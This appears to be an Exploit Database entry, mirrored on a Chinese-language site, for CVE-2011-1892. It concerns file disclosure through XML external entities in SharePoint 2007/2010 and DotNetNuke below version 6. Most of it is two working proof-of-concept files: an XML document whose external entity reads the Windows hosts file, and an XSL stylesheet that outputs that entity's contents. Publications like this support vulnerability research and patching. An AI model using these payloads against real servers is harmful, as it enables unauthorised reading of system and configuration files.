SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

• Exploit Database
• 11 阅读

• 作者： Nicolas Gregoire
  日期： 2011-09-20
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17873/

• Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
  Date: September 15, 2011
  Author: Nicolas Gregoire
  Version: SharePoint 2007 / 2010, DotNetNuke < 6
  CVE : CVE-2011-1892
  
  poc filename: xee.xml
  
  <!DOCTYPE doc [
  <!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
  ]>
  <doc>&boom;</doc>
  
  poc filename: xee.xsl
  
  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
  <xsl:apply-templates/>
  <xsl:value-of select="doc"/>
  </xsl:template>
  </xsl:stylesheet>